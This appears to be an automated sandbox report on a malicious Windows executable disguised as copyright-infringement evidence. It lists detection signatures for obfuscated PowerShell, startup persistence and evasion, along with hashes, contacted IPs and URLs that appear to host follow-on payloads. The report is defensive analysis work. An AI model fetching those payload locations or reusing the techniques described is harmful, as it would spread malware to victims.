Windows Analysis Report
copyright_infringement_evidence_1.exe

Overview

General Information

Sample name: copyright_infringement_evidence_1.exe
Analysis ID: 1528568
MD5: 8c04e5d5adaf15173fecd9384ceda14d
SHA1: 9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54
SHA256: 31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad
Tags: exeXiamenHuixiantongNetworkTechnologyCoLtduser-SquiblydooBlog
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt Virustotal: Detection: 10% Perma Link
Source: https://raw.githubusercontent.co Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: copyright_infringement_evidence_1.exe Virustotal: Detection: 15% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 94.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A178F110 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036, 0_2_00007FF7A178F110
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1803050 DecryptMessage, 0_2_00007FF7A1803050
Source: copyright_infringement_evidence_1.exe Static PE information: certificate valid
Source: copyright_infringement_evidence_1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 443
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.47.168.24 23.47.168.24
Source: Joe Sandbox View IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2p_bee.js
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2p_bee.jsT
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/2x_bee.js
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/Benefits.pdf
Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.214.220.82/data/Benefits.pdfy
Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/
Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756878169.0000024591734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752132639.000002459172E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754105505.0000024591732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0
Source: wscript.exe, 0000002C.00000002.3473543541.000001A7C67E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqn
Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2759005910.00000245935F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753152909.00000245919C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756734173.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752530561.00000245938C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758612409.00000245919CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758847618.00000245935C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473103355.0000025469B55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473731925.000002546B766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3475106348.000002546BA30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3473543541.000001A7C67C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830702699.000001A7C6801000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830853242.000001A7C6806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3472903249.000001A7C4C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqnx
Source: wscript.exe, 0000002C.00000002.3475617575.000001A7C6A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/0Hqnx2
Source: wscript.exe, 00000008.00000003.2755090080.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757118395.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2752222728.000001C4CE1B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6
Source: wscript.exe, 00000008.00000003.2754225942.000001C4D0006000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2759045448.000001C4CE4EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2754808331.000001C4D0007000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2753774026.000001C4CE4E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuV
Source: wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2755090080.000001C4CE1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuVl6r.dll
Source: wscript.exe, 00000008.00000003.2751035108.000001C4D0290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://paste.ee/d/6fcuVn
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000023.00000002.2350744372.0000020811384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF5330C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32723000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390C018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.pki/
Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.w3.
Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2295368563.00000174D4B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA517EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB3274D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.2350744372.00000208108E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF528A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 0000001F.00000002.2686280354.000001BA72CA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee//a
Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/1
